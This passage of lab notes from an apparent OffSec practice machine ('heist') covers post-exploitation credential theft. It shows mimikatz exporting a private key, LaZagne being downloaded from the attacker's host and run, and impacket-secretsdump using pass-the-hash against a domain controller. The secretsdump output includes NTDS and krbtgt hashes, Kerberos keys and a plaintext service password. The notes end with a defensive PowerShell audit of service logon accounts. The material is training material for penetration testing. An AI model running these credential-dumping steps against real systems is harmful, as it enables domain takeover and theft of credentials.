	|Implementation: NCRYPT_IMPL_SOFTWARE_FLAG ; 
	Key Container  : e7cdea7a-52c3-c502-fdfe-8c9e141907a0
	Unique name    : 63ffbb8a1852a1651127d0571170f26f_7cdd6232-ce1f-47fd-88fd-58e62ed4572a
	Algorithm      : RSA
	Key size       : 2048 (0x00000800)
	Export policy  : 00000000 ( )
	Exportable key : NO
	LSA isolation  : NO
	Private export : OK - 'user_cng_0_e7cdea7a-52c3-c502-fdfe-8c9e141907a0.rsa.pvk'
 
 
mimikatz(commandline) # exit
Bye!

LaZagne


PS C:\tmp> iwr -Uri http://192.168.45.176/LaZagne.exe -OutFile C:\tmp\LaZagne.exe

Uploading LaZagne.exe

PS C:\tmp> .\LaZagne.exe all
|====================================================================|
|                                                                    |
|                        The LaZagne Project                         |
|                                                                    |
|                          ! BANG BANG !                             |
|                                                                    |
|====================================================================|
 
 
[+] 0 passwords have been found.
For more information launch it again with the -v option
 
elapsed time = 0.8125019073486328

impacket-secretsdump


┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/heist]
└─$ impacket-secretsdump administrator@dc01.heist.offsec -hashes :b325100ee400c16d56c42f9685381139
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 
 
[*] Target system bootKey: 0xe9a15188a6ad2d20d26fe2bc984b369e
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:4942de0385b66f88cf6f9e2fb703ae7b:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC 
HEIST\DC01$:aes256-cts-hmac-sha1-96:a2000c9407dde22d68141793f38ab597d51ef52f9d75f86b67dd2d40c2fcf822
HEIST\DC01$:aes128-cts-hmac-sha1-96:4f92fc3abc447b0e56f8d140870741f7
HEIST\DC01$:des-cbc-md5:4c9da8647625f8c4
HEIST\DC01$:plain_password_hex:f9ac84544b2fdbede60918c3963e8804b27f0db8052e145d635d59de7295d4eec20be1c3419ffef0dc6fffd50a23c4f8bc80e0d10395a182ab6f9a4044ab41df6024217bd8b47311050455ec635e07b820793bd30003a9fc933f244a6e8d4892ebd3fa626c2f744dc4df5f57fdd167245b5b664109d343c2c05e2933856449e20e2e6dea1270e66c2d211743f7a1f06b1249e89b5acdd2fe179629cb571cab444e241f3aa495516527c6d58df9dd9ed0d8aee13e94403a7a9345487dd9a623b418001517b65bc90400724975ca2dc8faa04fa28593dedfff0d6f1df6eb2935cef69e98fe3cc0784e1878cfbe24aad0c9
HEIST\DC01$:aad3b435b51404eeaad3b435b51404ee:1561bd404f929907a89517d421b5f11b:::
[*] DPAPI_SYSTEM 
dpapi_machinekey:0x3df657e4617398e4ab73e41c6183f8ac3d608523
dpapi_userkey:0xc69b79bdce1e77b22043bbb5bd336c39d3965012
[*] NL$KM 
 0000   4A E2 C6 53 5D 77 02 C9  AE A9 48 23 7C 5B 46 39   J..S]w....H#|[F9
 0010   4A 56 02 3B CC 38 B8 C0  92 DD 41 2C 72 F2 63 46   JV.;.8....A,r.cF
 0020   71 36 1B E3 D2 BA E7 AC  8C BD E9 D5 55 36 C0 07   q6..........U6..
 0030   99 5A 11 4A 24 E4 42 E3  4C 12 3F F5 1B D7 D5 8C   .Z.J$.B.L.?.....
NL$KM:4ae2c6535d7702c9aea948237c5b46394a56023bcc38b8c092dd412c72f2634671361be3d2bae7ac8cbde9d55536c007995a114a24e442e34c123ff51bd7d58c
[*] _SC_FlaskService 
HEIST\enox:california
[*] _SC_GMSA_DPAPI_{C6810348-4834-4a1e-817D-5838604E6004}_7885a5def08901853c5c7bd844057ee9c666cd6e23e9b7a048577ac7248fa744 
[*] _SC_GMSA_{84A78B8C-56EE-465b-8496-FFB35A1B52A7}_7885a5def08901853c5c7bd844057ee9c666cd6e23e9b7a048577ac7248fa744 
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:b325100ee400c16d56c42f9685381139:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:3198641a390fccf87a72629f8fd1bd37:::
enox:1103:aad3b435b51404eeaad3b435b51404ee:bddb2a060aac3fb97c34707fabee7f30:::
DC01$:1000:aad3b435b51404eeaad3b435b51404ee:1561bd404f929907a89517d421b5f11b:::
svc_apache$:1105:aad3b435b51404eeaad3b435b51404ee:f018713880015ab7b496f7bbf049f0fc:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:d4e135e862ea6eae8575861230af84537d6dfa12720e328644822c20b2e911bf
Administrator:aes128-cts-hmac-sha1-96:8a9270d02cbbf911389a41b84af0cc5c
Administrator:des-cbc-md5:f84ae602a7c776b9
krbtgt:aes256-cts-hmac-sha1-96:fb2e36d495211856960c999f084261baf29a6a45633e796ca4a9c1f64b2c8923
krbtgt:aes128-cts-hmac-sha1-96:980738f8c26c4b660232c9e3de44c470
krbtgt:des-cbc-md5:d35e621aab321657
enox:aes256-cts-hmac-sha1-96:812e3f3bc88f59b0e61db203bbeb6ae42c62902c54a7272da4ce0b2e1e3bace2
enox:aes128-cts-hmac-sha1-96:fe6482cb86521263843a934de85de785
enox:des-cbc-md5:5b38078552bcfd64
DC01$:aes256-cts-hmac-sha1-96:a2000c9407dde22d68141793f38ab597d51ef52f9d75f86b67dd2d40c2fcf822
DC01$:aes128-cts-hmac-sha1-96:4f92fc3abc447b0e56f8d140870741f7
DC01$:des-cbc-md5:1cc1c2b6dfb6437a
svc_apache$:aes256-cts-hmac-sha1-96:17299939ac6048bb2a61331b99a7c836920df04c17bfb903bf820a55a5f5854a
svc_apache$:aes128-cts-hmac-sha1-96:2807a326311ae348978deb52ea80c937
svc_apache$:des-cbc-md5:cee9c13708c27f13
[*] Cleaning up...
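
The `_SC_FlaskService` entry above is recoverable because the service logs on as an ordinary domain user (`HEIST\enox`), so its password is kept as an LSA secret on the host. The audit below is an added example, not part of the original notes: it classifies service logon accounts so that services running as user accounts can be moved to managed accounts. The function names, the sample rows and the service names other than `FlaskService` are assumptions made for illustration.

```powershell
# Added example (not from the original notes): classify service logon accounts
# to find services whose password is stored as an _SC_<ServiceName> LSA secret.

# Built-in identities have no stored password.
$BuiltInAccounts = @(
    'LocalSystem',
    'NT AUTHORITY\SYSTEM',
    'NT AUTHORITY\LocalService',
    'NT AUTHORITY\NetworkService'
)

function Get-LogonAccountClass {
    param([string] $Account)
    if ([string]::IsNullOrWhiteSpace($Account)) { return 'None' }
    if ($BuiltInAccounts -contains $Account)    { return 'BuiltIn' }
    if ($Account -like 'NT SERVICE\*')          { return 'VirtualAccount' }
    # Names ending in '$' are machine or (group) managed service accounts,
    # whose passwords are rotated by the domain rather than typed by an admin.
    if ($Account.EndsWith('$'))                 { return 'ManagedOrMachineAccount' }
    return 'UserAccount'
}

function Get-ServiceAccountRisk {
    param([Parameter(Mandatory)] [object[]] $Service)   # needs Name and StartName
    foreach ($svc in $Service) {
        $class = Get-LogonAccountClass -Account ([string]$svc.StartName)
        [pscustomobject]@{
            Service     = $svc.Name
            Account     = $svc.StartName
            Class       = $class
            # A user account means a static, human-chosen password sits in LSA secrets.
            NeedsReview = ($class -eq 'UserAccount')
        }
    }
}

# Constructed sample rows shaped like Win32_Service objects. Only FlaskService and
# its account come from the dump above; the other service names are hypothetical.
$sample = @(
    [pscustomobject]@{ Name = 'FlaskService';       StartName = 'HEIST\enox' }
    [pscustomobject]@{ Name = 'ExampleGmsaService'; StartName = 'HEIST\svc_apache$' }
    [pscustomobject]@{ Name = 'ExampleSystemSvc';   StartName = 'LocalSystem' }
    [pscustomobject]@{ Name = 'ExampleVirtualSvc';  StartName = 'NT SERVICE\ExampleVirtualSvc' }
)

# Only FlaskService is flagged for review.
Get-ServiceAccountRisk -Service $sample | Where-Object NeedsReview | Format-Table -AutoSize

# On a live host, feed it the real service list instead:
# Get-ServiceAccountRisk -Service (Get-CimInstance -ClassName Win32_Service) |
#     Where-Object NeedsReview
```

Any service the audit flags should have its account password rotated and, where the application allows it, be moved to a group managed service account.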